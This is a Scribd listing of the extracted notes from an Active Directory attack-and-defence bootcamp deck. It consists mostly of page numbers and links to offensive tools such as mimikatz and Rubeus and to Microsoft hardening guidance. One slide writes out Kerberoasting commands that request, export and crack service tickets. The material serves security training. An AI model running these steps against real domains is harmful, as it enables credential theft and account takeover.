Scribd Logo
Upload

Welcome to Scribd!

  • Attacking and Defending ActiveDirectory - Bootcamp SlideNotes

    Uploaded by

    Antonio Sanchez Moscoso
    88 views303 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    88 views303 pages

    Attacking and Defending ActiveDirectory - Bootcamp SlideNotes

    Uploaded by

    Antonio Sanchez Moscoso

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 303

    1

    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://technet.microsoft.com/en-us/library/cc780036(v=ws.10).aspx

    11
    12
    13
    14
    15
    16
    Check out Invoke-CradleCrafter:
    https://github.com/danielbohannon/Invoke-CradleCrafter

    18
    19
    20
    15 ways to bypass PowerShell execution policy
    https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-
    execution-policy

    21
    22
    https://github.com/OmerYa/Invisi-
    Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
    https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-
    api/profiling/profiling-overview

    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    Microsoft Cloud Red Teaming Paper: https://gallery.technet.microsoft.com/Cloud-
    Red-Teaming-b837392e

    36
    37
    38
    39
    40
    https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-
    without-installing-the-remote-server-tools/
    https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-
    PowerShell-CLM.html

    41
    53
    58
    Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-
    aces
    Active Directory Rights: https://docs.microsoft.com/en-
    us/dotnet/api/system.directoryservices.activedirectoryrights1
    Extended Rights: https://docs.microsoft.com/en-us/previous-versions/tn-
    archive/ff405676(v=msdn.10)
    64
    Reference: https://docs.microsoft.com/en-us/previous-versions/windows/it-
    pro/windows-server-2003/cc773178(v=ws.10)
    76
    82
    NTLM Relaying example - https://github.com/antonioCoco/RemotePotato0

    83
    86
    87
    http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

    88
    See more at http://www.labofapenetrationtester.com/2014/08/script-execution-and-
    privilege-esc-jenkins.html
    http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-
    day-1.html

    89
    90
    91
    92
    93
    https://docs.microsoft.com/en-us/previous-versions/technet-
    magazine/ff700227(v=msdn.10)

    94
    97
    https://github.com/gentilkiwi/mimikatz
    Unofficial mimikatz guide:
    https://adsecurity.org/?p=2207
    https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-
    find-credentials-in-them
    https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
    https://github.com/b4rtik/SharpKatz
    https://github.com/outflanknl/Dumpert
    https://github.com/Flangvik/BetterSafetyKatz
    https://github.com/GhostPack/SafetyKatz
    https://github.com/skelsec/pypykatz
    https://github.com/Hackndo/lsassy
    https://github.com/SecureAuthCorp/impacket/
    https://github.com/FSecureLABS/physmem2profit
    Reference for logon types: https://www.alteredsecurity.com/post/fantastic-windows-
    logon-types-and-where-to-find-credentials-in-them
    https://github.com/GhostPack/Rubeus/
    A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection

    109
    110
    111
    112
    113
    https://github.com/gentilkiwi/mimikatz
    https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/O
    ut-CompressedDll.ps1

    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    126
    http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-
    and.html

    127
    128
    Krbtgt hash could also be dumped from NTDS.di.

    129
    130
    131
    132
    133
    134
    List of SPNs: https://adsecurity.org/?page_id=183

    136
    137
    138
    141
    http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-
    malware-analysis/
    145
    https://adsecurity.org/?p=1785
    https://adsecurity.org/?p=1714
    151
    https://docs.microsoft.com/en-us/windows/win32/secauthn/ssp-packages-provided-
    by-Microsoft
    https://attack.mitre.org/wiki/Technique/T1101
    https://docs.microsoft.com/en-us/previous-versions/technet-
    magazine/ee361593(v=msdn.10)
    https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-
    practices/appendix-c--protected-accounts-and-groups-in-active-directory
    https://adsecurity.org/?p=1906
    https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-
    11_Active_directory_v2.5.pdf
    Ref for PowerView command: http://www.harmj0y.net/blog/redteaming/abusing-
    active-directory-permissions-with-powerview/
    https://gallery.technet.microsoft.com/Invoke-SDPropagator-to-c99ae41c
    169
    170
    Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings

    171
    https://github.com/samratashok/RACE
    https://github.com/samratashok/nishang/tree/master/Backdoors
    https://docs.microsoft.com/en-us/archive/blogs/wmi/scripting-wmi-namespace-
    security-part-1-of-3

    172
    Note: Ignore the 'I/O operation' error.
    https://github.com/samratashok/nishang/tree/master/Backdoors

    173
    https://github.com/HarmJ0y/DAMP
    https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-
    descriptor-modification-2cf505ec5c40

    174
    175
    https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%
    20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-
    %20Tim%20Medin%281%29.pdf

    176
    177
    Request a ticket using .NET classes
    Add-Type -AssemblyNAme System.IdentityModel
    New-Object
    System.IdentityModel.Tokens.KerberosRequestorSecurity
    Token -ArgumentList "MSSQLSvc/dcorp-
    mgmt.dollarcorp.moneycorp.local"

    Invoke-Kerberoast from BC Empire (https://github.com/BC-SECURITY/Empire)


    can be used as well for cracking with John or Hashcat.
    . .\Invoke-Kerberoast.ps1
    Invoke-Kerberoast -Identity svcadmin
    Crack ticket using tgsrepcrack
    Check if the ticket has been granted
    klist.exe
    Export all tickets using Mimikatz
    Invoke-Mimikatz -Command '"kerberos::list /export"'
    Crack the Service account password
    python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt
    '.\2-40a10000-studentuser@USSvc~serviceaccount-
    US.TECHCORP.LOCAL.kirbi'
    181
    Reference: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

    182
    183
    184
    185
    https://github.com/HarmJ0y/ASREPRoast

    186
    Reference: http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

    187
    188
    https://room362.com/post/2016/kerberoast-pt3/

    189
    https://room362.com/post/2016/kerberoast-pt3/

    190
    https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
    http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-
    kerberos-unconstrained-delegation.html
    https://adsecurity.org/?p=1667
    https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
    server-2012-R2-and-2012/dn466518(v=ws.11)
    195
    https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-
    active-directory/
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
    rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
    http://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-
    trusts/
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
    efsr/08796ba8-01c8-4872-9221-1000ec2eff31
    201
    https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-
    8135-400e-bdd9-33b552051d94
    https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
    https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
    214
    https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
    220
    221
    222
    223
    224
    https://adsecurity.org/?p=1588

    225
    226
    227
    List of Active Directory SPNs https://adsecurity.org/?page_id=183

    228
    229
    230
    231
    232
    http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-
    my/

    233
    234
    235
    236
    https://adsecurity.org/?p=1588

    237
    238
    List Active Directory SPNs https://adsecurity.org/?page_id=183

    239
    240
    241
    https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
    server-2012-r2-and-2012/hh831740(v=ws.11)

    242
    243
    Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-
    Owned.pdf

    244
    See page 4 and 5 for summary of attack techniques -
    https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    More at: https://docs.microsoft.com/en-us/sql/relational-databases/linked-
    servers/linked-servers-database-engine

    258
    259
    260
    261
    262
    263
    264
    265
    266
    https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-
    and-management/protected-users-security-group
    https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-
    configure-protected-accounts#BKMK_AddtoProtectedUsers

    267
    268
    269
    https://docs.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)
    271
    272
    273
    274
    275
    https://technet.microsoft.com/en-us/windows-server-docs/security/securing-
    privileged-access/securing-privileged-access-reference-material#ESAE_BM

    276
    277
    https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-
    the-Hash-Separation-Of-Powers-wp.pdf

    278
    279
    280
    https://blogs.technet.microsoft.com/cbernier/2015/10/06/microsoft-advanced-
    threat-analytics/
    https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-
    explore/ata-threats
    https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-
    for-ActiveDirectory-Domination.pdf
    285
    286
    Configuring Additional LSA Protection: https://docs.microsoft.com/en-us/windows-
    server/security/credentials-protection-and-management/configuring-additional-lsa-
    protection
    https://technet.microsoft.com/en-us/library/cc755321(v=ws.10).aspx
    298
    299
    300
    301
    302
    303

    You might also like